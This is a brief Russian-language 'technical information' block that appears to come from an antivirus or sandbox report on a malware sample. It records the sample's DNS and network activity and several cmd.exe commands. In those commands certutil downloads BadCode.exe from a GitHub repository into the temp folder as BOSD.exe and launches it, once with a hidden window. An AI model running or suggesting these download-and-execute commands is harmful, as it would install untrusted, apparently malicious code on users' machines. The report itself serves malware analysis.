Техническая информация
- '<SYSTEM32>\cmd.exe' /c certutil -urlcache -split -f https://raw.githubusercontent.com/NyanMEMZ/BadCode/main/BadCode.exe %temp%\BOSD.exe&start %temp%\BOSD.exe
- 'ra#.####ubusercontent.com':443
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com
- '<SYSTEM32>\cmd.exe' /c certutil -urlcache -split -f https://raw.githubusercontent.com/NyanMEMZ/BadCode/main/BadCode.exe %temp%\BOSD.exe&start %temp%\BOSD.exe' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://raw.githubusercontent.com/NyanMEMZ/BadCode/main/BadCode.exe %TEMP%\BOSD.exe